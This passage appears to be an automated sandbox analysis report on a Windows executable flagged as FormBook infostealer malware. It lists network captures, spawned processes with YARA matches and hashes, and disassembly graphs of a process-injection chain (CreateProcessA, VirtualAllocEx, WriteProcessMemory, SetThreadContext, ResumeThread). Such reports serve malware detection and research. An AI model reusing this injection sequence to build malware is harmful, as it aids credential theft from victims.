                                                                                                            Data Ascii: 9PZt=btkQLzgK81PCRn9N1fOMKcA5vsBUpc3KXpwvZoL48DQ1Tosns+EA5186D3D8tf18hOAfGI8/MCCCwMJTYlZ8rJfyVmM2lXkhGuJcil4CNP3HdmGg4OE+2/H8p7sW6nmOQ17gjKUqnH9SMIDvZ2yVntw7+FoQfbGJf+fm+LqQ2H/LCQBtExzNf0cKVwDQpT11ilrTyRbUpSEX+Z/4vR2HOPsP2X4yTIl578y3+JbNVX/TfLxnv+Dt8orSY0gcC0QC/3sDKlIg6fiNdWcxZPWTeaqgEzuGgA95velOJWqP8g/TjhoT/gID+243jXM7p4kmCkU+QJGrhbI2Umhww4cGpFrfXRneyJwuh52Wk1jfyai3CZKt55F4qlPvLJJnit9zH3H5Rfj/Uel6Y8x9qb8uDE5MVlxnAaumAuR0H0yPWi04rhCxE/53LhWJyZYbo/erRq1UIP4ZzyIAqETzZfBjTvFKAJfjX7uz3xHd2BBSCj1EDYB+l0I7jSqLnnP9oKLsvhUI3ZktSeR5UX6gTSd72vJyp1iivgte+0TSDSyS2wznNCvzVGp9HvUQIkzKA9rVgL3YuD0qf2ZTw4vM3R9YUzfy5rvZinagedIIu8+pG2NmCUxTrxLdZpIqPEaWlG9XP2ukwkamapnifB+a0Dxqo9atvubH/W9ZFMMPAGmFE0CZKpb1ytryOPtgAy/RdkImzM/9PlEykDquVP/Fyqv9P4rqQDVt5xoHveKwWEEDqqe4whha6FmhXgs5BeThLLv4bTIXE4xTQ3Th4jM4NqZpPpK5WK8UY7R7t+vdNa9WbUVq4lBhg9cdt7YH60TFtf8d4mnRgu5D2/KfIlnaGhT4px4LFF6WfDafuvnIO2AEOT+mTi0YkNak6WHpOhilb/VArvVrsBGOZlH9OS+DK0RcT+Y1pDYEOXQ6ZirCstI4XmvxLpvLRkCJKwx1GOJJ4akDxyIwluj0BN7w2KhI7BkFTzIPIOMVwQJxmXs+6rfksHA8ti9 [TRUNCATED]
                                                                                                            Jan 11, 2025 04:27:34.991112947 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:27:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eK4381bU4f0y4%2Fst3HTiPCypINiMaFLufdi26j7X%2BqaOtEelLjufxFb%2F0hl4pXkq8j1FZJLBQa6uc%2FMOoOQjkvEYTVzsCUyddZ6DRN1HqwMn6i9c4CXihJN%2Bc7YOL7xR2fCHT%2B0anvVt"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cfd23f1d1875-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1519&rtt_var=759&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                                            Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTq
                                                                                                            Jan 11, 2025 04:27:34.991226912 CET391INData Raw: 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59
                                                                                                            Data Ascii: DPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %27})JH+m@^4gp4GqUO


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:22:24:26
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\BalphRTkPS.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\BalphRTkPS.exe"
                                                                                                            Imagebase:0xb90000
                                                                                                            File size:962'560 bytes
                                                                                                            MD5 hash:E3B4DDAA99A7555532EA6B36BFF69AFC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:22:24:44
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\BalphRTkPS.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\BalphRTkPS.exe"
                                                                                                            Imagebase:0xac0000
                                                                                                            File size:962'560 bytes
                                                                                                            MD5 hash:E3B4DDAA99A7555532EA6B36BFF69AFC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:22:24:53
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe"
                                                                                                            Imagebase:0x5e0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:22:24:55
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                                                            Imagebase:0x980000
                                                                                                            File size:122'880 bytes
                                                                                                            MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:22:25:08
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe"
                                                                                                            Imagebase:0x5e0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:22:25:20
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff728280000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.6%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:61
                                                                                                              Total number of Limit Nodes:5
                                                                                                              execution_graph 37177 750db50 37178 750db9b ReadProcessMemory 37177->37178 37180 750dbdf 37178->37180 37181 750d410 37182 750d450 ResumeThread 37181->37182 37184 750d481 37182->37184 37206 750d4c0 37207 750d505 Wow64SetThreadContext 37206->37207 37209 750d54d 37207->37209 37236 750d9a0 37237 750d9e0 VirtualAllocEx 37236->37237 37239 750da1d 37237->37239 37240 750da60 37241 750daa8 WriteProcessMemory 37240->37241 37243 750daff 37241->37243 37185 12a4668 37186 12a467a 37185->37186 37187 12a4686 37186->37187 37189 12a4779 37186->37189 37190 12a479d 37189->37190 37194 12a4878 37190->37194 37198 12a4888 37190->37198 37196 12a4888 37194->37196 37195 12a498c 37195->37195 37196->37195 37202 12a449c 37196->37202 37200 12a48af 37198->37200 37199 12a498c 37199->37199 37200->37199 37201 12a449c CreateActCtxA 37200->37201 37201->37199 37203 12a5918 CreateActCtxA 37202->37203 37205 12a59db 37203->37205 37222 12ad5c8 37223 12ad60e 37222->37223 37227 12ad7a8 37223->37227 37230 12ad797 37223->37230 37224 12ad6fb 37233 12abca0 37227->37233 37231 12abca0 DuplicateHandle 37230->37231 37232 12ad7d6 37230->37232 37231->37232 37232->37224 37234 12ad810 DuplicateHandle 37233->37234 37235 12ad7d6 37234->37235 37235->37224 37210 74e5d58 37212 74e5da6 DrawTextExW 37210->37212 37213 74e5dfe 37212->37213 37244 750dce8 37245 750dd71 CreateProcessA 37244->37245 37247 750df33 37245->37247 37247->37247 37214 12aae30 37217 12aaf19 37214->37217 37215 12aae3f 37218 12aaf5c 37217->37218 37219 12aaf39 37217->37219 37218->37215 37219->37218 37220 12ab160 GetModuleHandleW 37219->37220 37221 12ab18d 37220->37221 37221->37215 37248 75c01a0 37249 75c032b 37248->37249 37250 75c01c6 37248->37250 37250->37249 37253 75c041a 37250->37253 37256 75c0420 PostMessageW 37250->37256 37254 75c0420 PostMessageW 37253->37254 37255 75c048c 37254->37255 37255->37250 37257 75c048c 37256->37257 37257->37250

                                                                                                              Executed Functions

                                                                                                              Function 07507FE0 Relevance: .1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 051b830ddb7d2739e0c751ff6b4b84279bb2ebe47995941af972527407a2e047
                                                                                                              • Instruction ID: 20820a07e9fa96a2044811dc9d19fe2220cae01bd4217618db18dacf89f1abab
                                                                                                              • Opcode Fuzzy Hash: 051b830ddb7d2739e0c751ff6b4b84279bb2ebe47995941af972527407a2e047
                                                                                                              • Instruction Fuzzy Hash: D121E3B1D046188BEB18CFA7D8157DEBBF6BFC9300F04C46AD40966294DB7419468F90
                                                                                                              Function 07507FF0 Relevance: .1, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f904e14a763f46331061dc534219953cdacc6b1f359dcaf986ae3903921662c9
                                                                                                              • Instruction ID: 7aa00293837450c16be44e6733a05de266d92f34dd309cbb974a2077d434b776
                                                                                                              • Opcode Fuzzy Hash: f904e14a763f46331061dc534219953cdacc6b1f359dcaf986ae3903921662c9
                                                                                                              • Instruction Fuzzy Hash: B021C0B0D046188BEB18CFABC8557EEFAF6BFC9300F04C56AD419662A4DBB51945CF90
                                                                                                              Function 0750DCDC Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 750dcdc-750dd7d 3 750ddb6-750ddd6 0->3 4 750dd7f-750dd89 0->4 11 750ddd8-750dde2 3->11 12 750de0f-750de3e 3->12 4->3 5 750dd8b-750dd8d 4->5 6 750ddb0-750ddb3 5->6 7 750dd8f-750dd99 5->7 6->3 9 750dd9b 7->9 10 750dd9d-750ddac 7->10 9->10 10->10 13 750ddae 10->13 11->12 14 750dde4-750dde6 11->14 20 750de40-750de4a 12->20 21 750de77-750df31 CreateProcessA 12->21 13->6 15 750dde8-750ddf2 14->15 16 750de09-750de0c 14->16 18 750ddf4 15->18 19 750ddf6-750de05 15->19 16->12 18->19 19->19 22 750de07 19->22 20->21 23 750de4c-750de4e 20->23 32 750df33-750df39 21->32 33 750df3a-750dfc0 21->33 22->16 25 750de50-750de5a 23->25 26 750de71-750de74 23->26 27 750de5c 25->27 28 750de5e-750de6d 25->28 26->21 27->28 28->28 30 750de6f 28->30 30->26 32->33 43 750dfd0-750dfd4 33->43 44 750dfc2-750dfc6 33->44 46 750dfe4-750dfe8 43->46 47 750dfd6-750dfda 43->47 44->43 45 750dfc8 44->45 45->43 49 750dff8-750dffc 46->49 50 750dfea-750dfee 46->50 47->46 48 750dfdc 47->48 48->46 52 750e00e-750e015 49->52 53 750dffe-750e004 49->53 50->49 51 750dff0 50->51 51->49 54 750e017-750e026 52->54 55 750e02c 52->55 53->52 54->55 57 750e02d 55->57 57->57
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750DF1E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: fe1966023b7787c963275a0f08b168dea9915fb862486a4b2c8fbe3c61a5112e
                                                                                                              • Instruction ID: 9d8136d103bc6d0f5eed4df6cfe67c555ddfe7efe341eee9ca296f3591095db1
                                                                                                              • Opcode Fuzzy Hash: fe1966023b7787c963275a0f08b168dea9915fb862486a4b2c8fbe3c61a5112e
                                                                                                              • Instruction Fuzzy Hash: 76A14DB1E0031ADFDB24CFA8C8417EDBBB2BF44314F14856AE849A7284DB759985CF91
                                                                                                              Function 0750DCE8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 58 750dce8-750dd7d 60 750ddb6-750ddd6 58->60 61 750dd7f-750dd89 58->61 68 750ddd8-750dde2 60->68 69 750de0f-750de3e 60->69 61->60 62 750dd8b-750dd8d 61->62 63 750ddb0-750ddb3 62->63 64 750dd8f-750dd99 62->64 63->60 66 750dd9b 64->66 67 750dd9d-750ddac 64->67 66->67 67->67 70 750ddae 67->70 68->69 71 750dde4-750dde6 68->71 77 750de40-750de4a 69->77 78 750de77-750df31 CreateProcessA 69->78 70->63 72 750dde8-750ddf2 71->72 73 750de09-750de0c 71->73 75 750ddf4 72->75 76 750ddf6-750de05 72->76 73->69 75->76 76->76 79 750de07 76->79 77->78 80 750de4c-750de4e 77->80 89 750df33-750df39 78->89 90 750df3a-750dfc0 78->90 79->73 82 750de50-750de5a 80->82 83 750de71-750de74 80->83 84 750de5c 82->84 85 750de5e-750de6d 82->85 83->78 84->85 85->85 87 750de6f 85->87 87->83 89->90 100 750dfd0-750dfd4 90->100 101 750dfc2-750dfc6 90->101 103 750dfe4-750dfe8 100->103 104 750dfd6-750dfda 100->104 101->100 102 750dfc8 101->102 102->100 106 750dff8-750dffc 103->106 107 750dfea-750dfee 103->107 104->103 105 750dfdc 104->105 105->103 109 750e00e-750e015 106->109 110 750dffe-750e004 106->110 107->106 108 750dff0 107->108 108->106 111 750e017-750e026 109->111 112 750e02c 109->112 110->109 111->112 114 750e02d 112->114 114->114
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750DF1E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 162344514170b353bc22ac0d68c21c5d1b3d22f7f1949a237b13f5e39060aeaa
                                                                                                              • Instruction ID: f6dfcce71b2aeee33285b0de7f1214e0bfd4aaf819c2c1fe57e5bed4a6fcad87
                                                                                                              • Opcode Fuzzy Hash: 162344514170b353bc22ac0d68c21c5d1b3d22f7f1949a237b13f5e39060aeaa
                                                                                                              • Instruction Fuzzy Hash: 65913BB1E0031ADFDB24CFA8C8417EDBBB2BF44314F14856AE809A7284DB759985CF91
                                                                                                              Function 012AAF19 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 115 12aaf19-12aaf37 116 12aaf39-12aaf46 call 12a98a0 115->116 117 12aaf63-12aaf67 115->117 123 12aaf48 116->123 124 12aaf5c 116->124 119 12aaf7b-12aafbc 117->119 120 12aaf69-12aaf73 117->120 126 12aafc9-12aafd7 119->126 127 12aafbe-12aafc6 119->127 120->119 170 12aaf4e call 12ab1b0 123->170 171 12aaf4e call 12ab1c0 123->171 124->117 128 12aaffb-12aaffd 126->128 129 12aafd9-12aafde 126->129 127->126 134 12ab000-12ab007 128->134 131 12aafe9 129->131 132 12aafe0-12aafe7 call 12aa270 129->132 130 12aaf54-12aaf56 130->124 133 12ab098-12ab158 130->133 136 12aafeb-12aaff9 131->136 132->136 165 12ab15a-12ab15d 133->165 166 12ab160-12ab18b GetModuleHandleW 133->166 137 12ab009-12ab011 134->137 138 12ab014-12ab01b 134->138 136->134 137->138 141 12ab028-12ab031 call 12aa280 138->141 142 12ab01d-12ab025 138->142 146 12ab03e-12ab043 141->146 147 12ab033-12ab03b 141->147 142->141 148 12ab061-12ab06e 146->148 149 12ab045-12ab04c 146->149 147->146 156 12ab070-12ab08e 148->156 157 12ab091-12ab097 148->157 149->148 151 12ab04e-12ab05e call 12aa290 call 12aa2a0 149->151 151->148 156->157 165->166 167 12ab18d-12ab193 166->167 168 12ab194-12ab1a8 166->168 167->168 170->130 171->130
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012AB17E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: d0c4d3de8304598ed3e531bd6983f7fc8132aa8089dff7fa5ebfccabe1a2bdf5
                                                                                                              • Instruction ID: 3355b781a51714de3abaafdaad8e8eb12d97ecb1f9b20d7092ec2bd297787e46
                                                                                                              • Opcode Fuzzy Hash: d0c4d3de8304598ed3e531bd6983f7fc8132aa8089dff7fa5ebfccabe1a2bdf5
                                                                                                              • Instruction Fuzzy Hash: CE816970A10B468FD768DF29D0547AABBF1FF88304F00892ED19AD7A50DB75E845CB90
                                                                                                              Function 012A590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 172 12a590c-12a59d9 CreateActCtxA 174 12a59db-12a59e1 172->174 175 12a59e2-12a5a3c 172->175 174->175 182 12a5a4b-12a5a4f 175->182 183 12a5a3e-12a5a41 175->183 184 12a5a60 182->184 185 12a5a51-12a5a5d 182->185 183->182 187 12a5a61 184->187 185->184 187->187
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 012A59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: ef78d0f33ae3f12b747016ff122cd15fade003370258d99339f00bc3c99ec7ac
                                                                                                              • Instruction ID: 9d5f35587dba9dc465a9606af65290e3ed7f44abe048d07408359da7b496dc27
                                                                                                              • Opcode Fuzzy Hash: ef78d0f33ae3f12b747016ff122cd15fade003370258d99339f00bc3c99ec7ac
                                                                                                              • Instruction Fuzzy Hash: BF41E0B1C00719CBDB24CFAAC984BDEBBB1BF88304F60816AD408AB255DB755946CF50
                                                                                                              Function 012A449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 188 12a449c-12a59d9 CreateActCtxA 191 12a59db-12a59e1 188->191 192 12a59e2-12a5a3c 188->192 191->192 199 12a5a4b-12a5a4f 192->199 200 12a5a3e-12a5a41 192->200 201 12a5a60 199->201 202 12a5a51-12a5a5d 199->202 200->199 204 12a5a61 201->204 202->201 204->204
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 012A59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: c3e4b6d5c68f76cf42ee76a42b15bb391df4450a62a3b1ca90a4595dfb13e0cc
                                                                                                              • Instruction ID: 6e74e9da5154454d102103f9a2a7090eb117a36c34174a1cb3f8bce9a71b9226
                                                                                                              • Opcode Fuzzy Hash: c3e4b6d5c68f76cf42ee76a42b15bb391df4450a62a3b1ca90a4595dfb13e0cc
                                                                                                              • Instruction Fuzzy Hash: 6441F171C0071DCBDB24CFA9C984BCEBBB5BF88704F60806AD508AB251DBB16946CF90
                                                                                                              Function 0750DA58 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 205 750da58-750daae 208 750dab0-750dabc 205->208 209 750dabe-750dafd WriteProcessMemory 205->209 208->209 211 750db06-750db36 209->211 212 750daff-750db05 209->212 212->211
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750DAF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 2098c3eb1acea6b5d00233d76d5f02396505f67844a9c3a61e784452f63928ec
                                                                                                              • Instruction ID: 240043e079f0c7bac6a96ddee59977ce8ecd2d4b0b3982eb2501da6bad726881
                                                                                                              • Opcode Fuzzy Hash: 2098c3eb1acea6b5d00233d76d5f02396505f67844a9c3a61e784452f63928ec
                                                                                                              • Instruction Fuzzy Hash: 22216BB69003599FDF10CFA9C881BDEBBF4FF48320F10842AE958A7241D7789550CBA1
                                                                                                              Function 074E5D50 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 216 74e5d50-74e5da4 218 74e5daf-74e5dbe 216->218 219 74e5da6-74e5dac 216->219 220 74e5dc3-74e5dfc DrawTextExW 218->220 221 74e5dc0 218->221 219->218 222 74e5dfe-74e5e04 220->222 223 74e5e05-74e5e22 220->223 221->220 222->223
                                                                                                              APIs
                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074E5DEF
